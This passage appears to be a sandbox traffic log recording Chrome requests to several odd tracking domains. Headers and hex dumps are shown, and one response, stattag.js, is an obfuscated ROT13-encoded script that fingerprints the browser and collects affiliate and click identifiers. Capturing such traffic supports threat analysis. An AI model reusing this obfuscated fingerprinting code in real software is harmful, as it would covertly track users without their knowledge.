                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4173f91b8c9b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 37 37 37 30 5d 2c 7b 36 37 37 37 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 34 37 2e 63 65 32 33 38 64 63 30 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 44 77 41 51
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[67770],{67770:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_47.ce238dc0.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAADwAQ
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          90192.168.2.450139185.49.145.454438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC431OUTGET /log/add?cid=eacf36da-c06d-4d71-90cc-88e30cd4240a&ruid=6ccfebb8-c732-490f-a46c-39244b55a680 HTTP/1.1
                                                                                                          Host: datatechonert.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:24 UTC453INHTTP/1.1 400 Bad Request
                                                                                                          Server: nginx/1.25.5
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Content-Length: 25
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin:
                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          2025-01-06 11:09:24 UTC25INData Raw: 7b 22 73 74 61 74 75 73 22 3a 30 2c 22 65 72 72 6f 72 22 3a 31 30 30 31 7d
                                                                                                          Data Ascii: {"status":0,"error":1001}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          91192.168.2.450140104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/ae2aa467dd9af961-1736072686539.fa66633a9d1758bd.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-174"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41765bd90c96-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC379INData Raw: 31 37 34 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 34 34 38 37 5d 2c 7b 38 34 34 38 37 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 33 33 2e 62 61 34 36 38 64 31 31 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 49 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 59 41 41 41 44 77 41 51
                                                                                                          Data Ascii: 174"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[84487],{84487:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_33.ba468d11.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlIAAABXRUJQVlA4IEYAAADwAQ
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          92192.168.2.450141188.114.96.34438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC348OUTGET /stattag.js HTTP/1.1
                                                                                                          Host: cdntechone.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:24 UTC1034INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Content-Length: 16490
                                                                                                          Connection: close
                                                                                                          Last-Modified: Thu, 11 Jul 2024 10:23:50 GMT
                                                                                                          ETag: "668fb2b6-406a"
                                                                                                          Link: <https://datatechone.com/>; rel=preconnect; crossorigin, <https://datatechonert.com/>; rel=preconnect; crossorigin
                                                                                                          Cache-Control: max-age=14400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1292
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5jmzQKaiYI8B8v294ATpyQfVN0daNmf6BJ33xCQH2ofhAAYPwz9RsRfvSPBgwdSdQBw6RHLmP95u9Mb3qiRrn4%2Fs5fjCbHM4Z5nnVfm%2Fch2GOolphlvaanF8%2BNEx%2FZ3wQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41769dd3c334-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1491&rtt_var=567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=926&delivery_rate=1916010&cwnd=247&unsent_bytes=0&cid=5b679acc506ba775&ts=148&x=0"
                                                                                                          2025-01-06 11:09:24 UTC335INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 5f 64 73 33 64 63 76 5f 5f 2e 6d 6d 68 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 24 29 7b 66 6f 72 28 76 61 72 20 78 2c 5f 3d 66 2e 6c 65 6e 67 74 68 2c 65 3d 24 5e 5f 2c 64 3d 30 3b 5f 3e 3d 34 3b 29 78 3d 28 36 35 35 33 35 26 28 78 3d 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 29 7c 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 64 29 29 3c 3c 38 7c 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 64 29 29 3c 3c 31 36 7c 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 64 29 29 3c 3c 32 34 29 29 2a 31 35 34 30 34 38 33 34 37 37 2b 28 28 28 78 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 2c 78 5e 3d 78 3e 3e 3e 32
                                                                                                          Data Ascii: !function(){window.__ds3dcv__.mmh=function(f,$){for(var x,_=f.length,e=$^_,d=0;_>=4;)x=(65535&(x=255&f.charCodeAt(d)|(255&f.charCodeAt(++d))<<8|(255&f.charCodeAt(++d))<<16|(255&f.charCodeAt(++d))<<24))*1540483477+(((x>>>16)*1540483477&65535)<<16),x^=x>>>2
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 37 37 2b 28 28 28 78 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 29 2c 5f 2d 3d 34 2c 2b 2b 64 3b 73 77 69 74 63 68 28 5f 29 7b 63 61 73 65 20 33 3a 65 5e 3d 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2b 32 29 29 3c 3c 31 36 3b 63 61 73 65 20 32 3a 65 5e 3d 28 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2b 31 29 29 3c 3c 38 3b 63 61 73 65 20 31 3a 65 5e 3d 32 35 35 26 66 2e 63 68 61 72 43 6f 64 65 41 74 28 64 29 2c 65 3d 28 36 35 35 33 35 26 65 29 2a 31 35 34 30 34 38 33 34 37 37 2b 28 28 28 65 3e 3e 3e 31 36 29 2a 31 35 34 30 34 38 33 34 37 37 26 36 35 35 33 35 29 3c 3c 31 36 29 7d 72 65 74 75 72 6e 20 65 5e 3d 65 3e 3e 3e 31 33 2c 65 3d 28 36 35 35 33 35 26 65 29 2a 31 35 34 30 34 38 33
                                                                                                          Data Ascii: 77+(((x>>>16)*1540483477&65535)<<16)),_-=4,++d;switch(_){case 3:e^=(255&f.charCodeAt(d+2))<<16;case 2:e^=(255&f.charCodeAt(d+1))<<8;case 1:e^=255&f.charCodeAt(d),e=(65535&e)*1540483477+(((e>>>16)*1540483477&65535)<<16)}return e^=e>>>13,e=(65535&e)*1540483
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 21 3d 3d 28 69 3d 61 28 74 5b 75 5d 29 29 29 7b 6f 5b 65 5d 3d 69 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 6f 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 5b 45 2e 50 5d 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 2c 6f 2c 72 29 7b 76 61 72 20 61 2c 64 3d 45 2e 72 3d 3d 3d 45 2e 72 5b 45 2e 4d 67 5d 28 29 2c 63 3d 6f 5b 45 2e 78 5d 7c 7c 45 2e 67 28 29 2c 75 3d 64 3f 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 45 2e 48 54 3b 45 2e 4f 64 21 3d 74 79 70 65 6f 66 20 6e 26 26 28 6e 3d 4a 53 4f 4e 5b 45 2e 5a 67 5d 28 6e 29 29 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 69 3d 45 2e 7a 3b 69 3c 6e 5b 45 2e 6f 5d 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 6e 5b 45 2e 72 59 5d 28 69 29 5e 65 5b 69 25 65 5b 45 2e 6f 5d 5d 5b
                                                                                                          Data Ascii: !==(i=a(t[u]))){o[e]=i;break}}return o},c=function(){return T[E.P]},u=function(n,e,i,o,r){var a,d=E.r===E.r[E.Mg](),c=o[E.x]||E.g(),u=d?function(n){var e=E.HT;E.Od!=typeof n&&(n=JSON[E.Zg](n));for(var t=[],i=E.z;i<n[E.o];i++){var o=n[E.rY](i)^e[i%e[E.o]][
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 65 74 75 72 6e 20 6f 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 5b 5d 3b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 45 2e 7a 3b 74 3c 6e 5b 45 2e 6f 5d 3b 74 2b 2b 29 65 5b 45 2e 45 5d 28 6c 28 45 2e 67 28 29 2c 6e 5b 74 5d 2c 21 45 2e 7a 29 29 3b 72 65 74 75 72 6e 20 65 7d 2c 67 3d 5b 5d 3b 67 5b 45 2e 45 5d 28 45 2e 67 28 45 2e 7a 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 5b 45 2e 4a 45 5d 3d 45 2e 76 45 2c 6e 5b 45 2e 43 45 5d 3d 45 2e 76 45 2c 6e 5b 45 2e 6c 45 5d 3d 2d 45 2e 71 3b 76 61 72 20 65 3d 4b 5b 45 2e 73 45 5d 28 45 2e 68 45 29 2c 74 3d 45 2e 67 28 45 2e 49 45 2c 21 45 2e 59 2c 45 2e 4c 45 2c 21 45 2e 59 2c 45 2e 78 45 2c 21 45 2e 59 2c 45 2e 6a 45 2c 21 45 2e 59 2c 45 2e 61 45 2c 21 45 2e 59 2c 45
                                                                                                          Data Ascii: eturn o},f=function(n){if(!n)return[];for(var e=[],t=E.z;t<n[E.o];t++)e[E.E](l(E.g(),n[t],!E.z));return e},g=[];g[E.E](E.g(E.z,function(n){n[E.JE]=E.vE,n[E.CE]=E.vE,n[E.lE]=-E.q;var e=K[E.sE](E.hE),t=E.g(E.IE,!E.Y,E.LE,!E.Y,E.xE,!E.Y,E.jE,!E.Y,E.aE,!E.Y,E
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 2e 47 64 5d 3d 59 5b 45 2e 58 64 5d 2c 6e 7d 2c 45 2e 57 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 21 28 45 2e 64 45 20 69 6e 20 54 29 29 72 65 74 75 72 6e 20 6e 5b 45 2e 55 64 5d 3d 45 2e 75 2c 6e 5b 45 2e 63 64 5d 3d 45 2e 75 2c 6e 3b 66 6f 72 28 76 61 72 20 65 3d 59 5b 45 2e 44 54 5d 7c 7c 5b 5d 2c 74 3d 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 50 6c 75 67 69 6e 41 72 72 61 79 26 26 45 2e 7a 21 3d 3d 65 5b 45 2e 6f 5d 3f 45 2e 59 3a 45 2e 7a 2c 69 3d 45 2e 4c 2c 6f 3d 45 2e 7a 3b 6f 3c 65 5b 45 2e 6f 5d 3b 6f 2b 2b 29 69 3d 69 2b 65 5b 6f 5d 5b 45 2e 6d 4b 5d 2b 45 2e 66 54 2b 28 65 5b 6f 5d 69 6e 73 74 61 6e 63 65 6f 66 20 50 6c 75 67 69 6e 3f 45 2e 51 54 3a 45 2e 47 54 29 2b 45 2e 70 45 3b 72 65 74 75 72 6e 20 6e 5b 45 2e 55 64 5d 3d 74 2c 6e 5b
                                                                                                          Data Ascii: .Gd]=Y[E.Xd],n},E.W,function(n){if(!(E.dE in T))return n[E.Ud]=E.u,n[E.cd]=E.u,n;for(var e=Y[E.DT]||[],t=e instanceof PluginArray&&E.z!==e[E.o]?E.Y:E.z,i=E.L,o=E.z;o<e[E.o];o++)i=i+e[o][E.mK]+E.fT+(e[o]instanceof Plugin?E.QT:E.GT)+E.pE;return n[E.Ud]=t,n[
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 5b 45 2e 43 64 5d 3d 76 6f 69 64 20 45 2e 7a 21 3d 3d 4b 5b 45 2e 43 64 5d 3f 4b 5b 45 2e 43 64 5d 3a 45 2e 75 2c 6e 7d 2c 45 2e 58 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 5b 45 2e 6c 64 5d 3d 4f 62 6a 65 63 74 5b 45 2e 75 67 5d 28 54 29 5b 45 2e 6b 54 5d 28 45 2e 59 45 29 2c 6e 7d 2c 45 2e 55 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 5b 45 2e 73 64 5d 3d 4f 62 6a 65 63 74 5b 45 2e 75 67 5d 28 54 29 5b 45 2e 6f 5d 2c 6e 7d 2c 45 2e 63 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 5b 45 2e 68 64 5d 3d 76 6f 69 64 20 45 2e 7a 21 3d 3d 54 5b 45 2e 79 54 5d 26 26 76 6f 69 64 20 45 2e 7a 21 3d 3d 54 5b 45 2e 79 54 5d 5b 45 2e 77 54 5d 3f 54 5b 45 2e 79 54 5d 5b 45 2e 77 54 5d 3a 45 2e 75 2c 6e 7d 2c
                                                                                                          Data Ascii: [E.Cd]=void E.z!==K[E.Cd]?K[E.Cd]:E.u,n},E.X,function(n){return n[E.ld]=Object[E.ug](T)[E.kT](E.YE),n},E.U,function(n){return n[E.sd]=Object[E.ug](T)[E.o],n},E.c,function(n){return n[E.hd]=void E.z!==T[E.yT]&&void E.z!==T[E.yT][E.wT]?T[E.yT][E.wT]:E.u,n},
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 5b 45 2e 62 4b 5d 2c 65 5b 45 2e 42 4b 5d 3d 74 5b 45 2e 42 4b 5d 2c 65 5b 45 2e 6e 4b 5d 3d 74 5b 45 2e 6e 4b 5d 2c 65 5b 45 2e 6b 4b 5d 3d 74 5b 45 2e 6b 4b 5d 2c 65 5b 45 2e 77 4b 5d 3d 74 5b 45 2e 77 4b 5d 2c 6e 5b 45 2e 44 45 5d 3d 65 7d 65 6c 73 65 20 6e 5b 45 2e 44 45 5d 3d 45 2e 67 28 29 3b 72 65 74 75 72 6e 20 6e 7d 29 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 65 3d 45 2e 7a 2c 74 3d 45 2e 7a 3b 74 3c 6e 5b 45 2e 6f 5d 3b 74 2b 2b 29 6e 5b 74 5d 26 26 28 65 2b 3d 45 2e 59 29 3b 72 65 74 75 72 6e 20 65 7d 2c 67 5b 45 2e 45 5d 28 45 2e 67 28 45 2e 7a 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 65 28 5b 45 2e 4f 4b 20 69 6e 20 54 2c 45 2e 4d 4b 20 69 6e 20 54 2c 45 2e 5a 4b 20 69 6e 20 54 2c 45 2e 51 64 20
                                                                                                          Data Ascii: [E.bK],e[E.BK]=t[E.BK],e[E.nK]=t[E.nK],e[E.kK]=t[E.kK],e[E.wK]=t[E.wK],n[E.DE]=e}else n[E.DE]=E.g();return n})),e=function(n){for(var e=E.z,t=E.z;t<n[E.o];t++)n[t]&&(e+=E.Y);return e},g[E.E](E.g(E.z,function(n){var t=e([E.OK in T,E.MK in T,E.ZK in T,E.Qd
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 28 54 5b 45 2e 75 7a 5d 29 2c 6e 28 4b 29 2c 6e 28 59 29 2c 6e 28 4b 5b 45 2e 52 54 5d 5b 45 2e 70 59 5d 29 5d 5b 45 2e 6f 54 5d 28 45 2e 4c 29 7d 28 29 2c 45 2e 4c 54 29 5b 45 2e 59 54 5d 28 29 29 7d 29 29 3b 76 61 72 20 6d 3d 5b 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 54 5b 45 2e 68 5d 5b 45 2e 43 5d 28 6e 29 7d 5d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 45 2e 4f 64 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 45 2e 53 54 28 65 2c 45 2e 4c 67 29 29 2c 65 3d 45 2e 53 54 28 65 29 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 69 3d 5b 5d 3b 45 2e 75 21 3d 3d 28 74 3d 65 5b 45 2e 49 5d 28 6e 29 29 3b 29 69 5b 45 2e 45 5d 28 74 29 3b 72 65 74 75 72 6e 20 69 7d 28 65 2c 45 2e 6c
                                                                                                          Data Ascii: (T[E.uz]),n(K),n(Y),n(K[E.RT][E.pY])][E.oT](E.L)}(),E.LT)[E.YT]())}));var m=[function(n){T[E.h][E.C](n)}],v=function(n){for(var e=n,t=function(n,e){E.Od==typeof e&&(e=E.ST(e,E.Lg)),e=E.ST(e);for(var t=[],i=[];E.u!==(t=e[E.I](n));)i[E.E](t);return i}(e,E.l
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 5b 45 2e 4e 59 5d 29 3b 76 61 72 20 74 3d 72 5b 45 2e 75 45 5d 3f 72 5b 45 2e 75 45 5d 3a 5b 5d 3b 69 66 28 74 26 26 74 5b 45 2e 6f 5d 29 66 6f 72 28 76 61 72 20 69 3d 45 2e 7a 3b 69 3c 72 5b 45 2e 75 45 5d 5b 45 2e 6f 5d 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 72 5b 45 2e 75 45 5d 5b 69 5d 3b 6f 26 26 6f 5b 45 2e 4e 59 5d 26 26 6f 5b 45 2e 4e 59 5d 5b 45 2e 46 59 5d 26 26 63 5b 45 2e 45 5d 28 6f 5b 45 2e 4e 59 5d 29 7d 66 6f 72 28 69 3d 45 2e 7a 3b 69 3c 63 5b 45 2e 6f 5d 3b 69 2b 2b 29 7b 76 61 72 20 61 3d 63 5b 69 5d 3b 74 72 79 7b 61 5b 45 2e 46 59 5d 28 45 2e 75 2c 5b 6e 2c 65 5d 29 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 7d 29 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 45
                                                                                                          Data Ascii: [E.NY]);var t=r[E.uE]?r[E.uE]:[];if(t&&t[E.o])for(var i=E.z;i<r[E.uE][E.o];i++){var o=r[E.uE][i];o&&o[E.NY]&&o[E.NY][E.FY]&&c[E.E](o[E.NY])}for(i=E.z;i<c[E.o];i++){var a=c[i];try{a[E.FY](E.u,[n,e])}catch(n){}}}),v=function(n){var e=function(n){return n&&E
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 27 2c 6c 3a 27 5c 5c 24 26 27 2c 73 3a 27 5b 3f 26 5d 27 2c 68 3a 27 79 62 70 6e 67 76 62 61 27 2c 49 3a 27 72 6b 72 70 27 2c 4c 3a 27 27 2c 78 3a 27 75 72 6e 71 72 65 66 27 2c 6a 3a 27 26 65 68 76 71 3d 27 2c 61 3a 27 65 5f 68 76 71 27 2c 75 67 3a 27 78 72 6c 66 27 2c 67 67 3a 27 67 65 6e 73 73 76 70 5f 66 62 68 65 70 72 5f 76 71 27 2c 45 67 3a 27 70 79 76 72 61 67 5f 76 71 27 2c 64 67 3a 27 68 61 78 61 62 6a 61 27 2c 54 67 3a 27 6e 73 73 76 79 76 6e 67 72 5f 76 71 27 2c 4b 67 3a 27 6e 71 69 72 65 67 76 66 72 65 5f 76 71 27 2c 59 67 3a 27 70 6e 7a 63 6e 76 74 61 5f 76 71 27 2c 7a 67 3a 27 70 68 66 67 62 7a 5f 76 71 5f 31 27 2c 71 67 3a 27 70 68 66 67 62 7a 5f 76 71 5f 32 27 2c 53 67 3a 27 70 79 76 70 78 5f 76 71 27 2c 6d 67 3a 27 70 62 66 67 27 2c 57 67
                                                                                                          Data Ascii: ',l:'\\$&',s:'[?&]',h:'ybpngvba',I:'rkrp',L:'',x:'urnqref',j:'&ehvq=',a:'e_hvq',ug:'xrlf',gg:'genssvp_fbhepr_vq',Eg:'pyvrag_vq',dg:'haxabja',Tg:'nssvyvngr_vq',Kg:'nqiregvfre_vq',Yg:'pnzcnvta_vq',zg:'phfgbz_vq_1',qg:'phfgbz_vq_2',Sg:'pyvpx_vq',mg:'pbfg',Wg


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          93192.168.2.450142104.18.3.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC347OUTGET /sync-do HTTP/1.1
                                                                                                          Host: forspearowor.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:25 UTC647INHTTP/1.1 405 Method Not Allowed
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Content-Length: 18
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, baggage, sentry-trace
                                                                                                          Pragma: no-cache
                                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                                          Timing-Allow-Origin: *
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4176bd1a0cba-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC18INData Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                                                                                          Data Ascii: Method Not Allowed


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
